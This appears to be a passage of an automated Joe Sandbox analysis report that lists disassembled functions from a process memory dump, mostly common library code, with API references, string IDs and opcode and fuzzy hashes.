                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8351C170A842869ADB2D8E68C8957FFBBF7AF06340F14445EE892DB3C1D7709942CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 005EBF6E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                              • API String ID: 118556049-2658103896
                                                                                                                                                                                                                              • Opcode ID: b2acb162babad28c204c2d8c6124b0c00e02beaa4a25dd8cb5cf3eee49e8a094
                                                                                                                                                                                                                              • Instruction ID: 6b367b45abe35ec5890a232441649c23e2babf48c9d853782466eec805866d66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2acb162babad28c204c2d8c6124b0c00e02beaa4a25dd8cb5cf3eee49e8a094
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D051F6B1C00748DFDB14CFA5C841BEEBBB8FF45300F14425AE945AB241E774AA45CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                              • API String ID: 0-3019864461
                                                                                                                                                                                                                              • Opcode ID: 489498785cf3f52e540927d4ed7b78aba42c62badfa2731eb39736795530ae9a
                                                                                                                                                                                                                              • Instruction ID: 1f9680052cca62a858b5f5fa98d3f537b8d5d0faf2048e1d4c4d41c6147958b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 489498785cf3f52e540927d4ed7b78aba42c62badfa2731eb39736795530ae9a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B151E370E047899BDF1CCF65C845BAEBBB6FF88304F10451DE481A7681EBB56984CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00606059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0060607E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                              • Opcode ID: 97e02ef99522d69e75f806b709c011041b57013ec2c7a1f84c7880ae2e8115c3
                                                                                                                                                                                                                              • Instruction ID: 300985c08ed1fecc2f03a361b658c38cec559c9656414f2f9e357383fe250e69
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97e02ef99522d69e75f806b709c011041b57013ec2c7a1f84c7880ae2e8115c3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8417931940209EFCF19DF98CD81AEEBBB6BF48304F188199F909672A2D3359961DB50
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005FDF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                              • String ID: !%x
                                                                                                                                                                                                                              • API String ID: 855520168-1893981228
                                                                                                                                                                                                                              • Opcode ID: bc05ba28b2ff9da072063446d5415334d7e2d19ffc206ac8dd5b28791b62112f
                                                                                                                                                                                                                              • Instruction ID: 922526e4975d9bc303f1aace84fac280f0f8fa5e7e97e063037261bf163932ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc05ba28b2ff9da072063446d5415334d7e2d19ffc206ac8dd5b28791b62112f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA318C71D0020DEBDF04DF94E885AEEBBBAFF48304F104419FA05A7252DB79AA45CB64
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006019FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3___cftoe
                                                                                                                                                                                                                              • String ID: !%x
                                                                                                                                                                                                                              • API String ID: 855520168-1893981228
                                                                                                                                                                                                                              • Opcode ID: 4d020d1422b62f870ee3dc40aa3f605574a3f7fe73a86a0d6758e4ee459adac6
                                                                                                                                                                                                                              • Instruction ID: d41836d8934b9a7003c69317ee0e9a91032d8be3b89bd66946c8a6fc4d6fb5bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d020d1422b62f870ee3dc40aa3f605574a3f7fe73a86a0d6758e4ee459adac6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17316B31E1525DAFDF09DF94D881AEEBBB6BF49300F140019F844AB282D7759A46CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 005E5F86
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,FAB1B776), ref: 005E5FF6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                              • String ID: Invalid SID
                                                                                                                                                                                                                              • API String ID: 3201929900-130637731
                                                                                                                                                                                                                              • Opcode ID: 1d38f385d4863f4bc0d6d7488c22744788aec92ad055d97788ce462364297aa0
                                                                                                                                                                                                                              • Instruction ID: 367023f44a622bcf8db3f955b9db5872de29abb0760c16c69fea9682ff83f23c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d38f385d4863f4bc0d6d7488c22744788aec92ad055d97788ce462364297aa0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B721C0B0A047459BDB14CF58C816BAFBBF9FF44718F10091DE855A7380D7BA6A048BD0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005E909B
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005E90FE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                              • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                              • Opcode ID: 309a8996dc46f8db0244b19f9fc973c2fa049f68da9f262b1031336c66f5b8f9
                                                                                                                                                                                                                              • Instruction ID: cd85953e6066ed3e0c8576c12a21d33408faa863727763ba271753fa7f5adfd8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 309a8996dc46f8db0244b19f9fc973c2fa049f68da9f262b1031336c66f5b8f9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5721D270805B84EED721CFA8C90474BBFF4EF19710F148A9DE49597782D3B9A604CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EF098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_
                                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                                              • API String ID: 2427045233-2658103896
                                                                                                                                                                                                                              • Opcode ID: 588576b42ed652d7dc7dbee6e61a70eb9daa276f3927b526a9f4bd6167d1a476
                                                                                                                                                                                                                              • Instruction ID: dc028f84483008b80692e85e82460e18bbfd01021749476ed9d527acb7cb5149
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 588576b42ed652d7dc7dbee6e61a70eb9daa276f3927b526a9f4bd6167d1a476
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8711B176941B85EEC728EFB5D445B8EBFF4BB05300F04851AE5E29B241EA30E605CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005F0D24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 005F0D30
                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 005F0D8B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: 2`
                                                                                                                                                                                                                              • API String ID: 593203224-1377069549
                                                                                                                                                                                                                              • Opcode ID: 3445e2c12aca1a6bd56ac221ef75a28d332b953c4336e86d544f89cfbf1072ef
                                                                                                                                                                                                                              • Instruction ID: 960072700d88fd7f1d3e6b749114f3d6a385221c4770393a1a34a66db382e1d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3445e2c12aca1a6bd56ac221ef75a28d332b953c4336e86d544f89cfbf1072ef
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49019E35600608EFCB14DF54C855EADBBBAFF84750B180099E9059B3A2DB70FE41CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061776F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 006177AF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                              • String ID: 2`$InitializeCriticalSectionEx
                                                                                                                                                                                                                              • API String ID: 2593887523-3616613772
                                                                                                                                                                                                                              • Opcode ID: 9e6f419a82ce98a17e0cca7a6f12308c2924a5e52123db29f466095eeb2ab8db
                                                                                                                                                                                                                              • Instruction ID: 4af82741437a1c8301edae541eac4c894db9913eba946166591c97ca607c9c19
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e6f419a82ce98a17e0cca7a6f12308c2924a5e52123db29f466095eeb2ab8db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1E09236284628FBCB211F61EC09DCD7F23EF44761F098011FD1865160DB719961EED0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00617559 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc
                                                                                                                                                                                                                              • String ID: 2`$FlsAlloc
                                                                                                                                                                                                                              • API String ID: 2773662609-2721895700
                                                                                                                                                                                                                              • Opcode ID: 6cba1c23ff77edff52a817735e2b2fea7f24cc6a903f7587d9762236048ff50e
                                                                                                                                                                                                                              • Instruction ID: b56aabeab7105938b1559b63b09dbf1bf101989acbe58ffddf9960d3f4c4e685
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cba1c23ff77edff52a817735e2b2fea7f24cc6a903f7587d9762236048ff50e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E0C232688B38B7C7202761AC0ADDD7A27DF54B61B491031FD04192509BA29992AAD5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00617915 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(0063E428), ref: 00617932
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID: (c$xc
                                                                                                                                                                                                                              • API String ID: 3664257935-1628501946
                                                                                                                                                                                                                              • Opcode ID: 58ac970d98784abd0a35e8435210f4ca9788c3e55f467bdd9885cbc823da19fe
                                                                                                                                                                                                                              • Instruction ID: 6f33b26b4b52fa73bbcad8a4f7c92694a35065fde5567f788b5a9a9856f5b442
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58ac970d98784abd0a35e8435210f4ca9788c3e55f467bdd9885cbc823da19fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27E0CD32C0861597EB311E18D404BE47BE65B64331F1D1939D8ED552D1D2711CD5C6E0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E4070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,005E4261,00624400,000000FF,FAB1B776,00000000,?,00000000,?,?,?,00624400,000000FF,?,005E3A75,?), ref: 005E4096
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,40000022,FAB1B776,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 005E4154
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,3FFFFFFF,FAB1B776,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 005E4177
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 005E4217
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2012307162-0
                                                                                                                                                                                                                              • Opcode ID: 06774bddb1471ce374dd9ebe92222b857a06a78f0fb06b09cabcb7c909918a1b
                                                                                                                                                                                                                              • Instruction ID: 58168f91442dfe464144f99dac96f76af032d360edd757fcbed4cd18713247ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06774bddb1471ce374dd9ebe92222b857a06a78f0fb06b09cabcb7c909918a1b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C51ADB5A002469FDB1CDF69C885AAEBBB6FB48310F14462DE965E7380D730AD40CF94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E1D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 005E1E01
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 005E1E21
                                                                                                                                                                                                                              • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 005E1EA7
                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000001,FAB1B776,00000000,00000000,00623C40,000000FF,?,00000000), ref: 005E1F2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Local$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2012307162-0
                                                                                                                                                                                                                              • Opcode ID: 1fcc55aea6d1083053dbe952d259a0b10bd533f9cc28a839cdc0cf564696537a
                                                                                                                                                                                                                              • Instruction ID: 82eb9001270f2802046244fec1ab0e56760bd3a68d5b0434a7559583f77503ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fcc55aea6d1083053dbe952d259a0b10bd533f9cc28a839cdc0cf564696537a
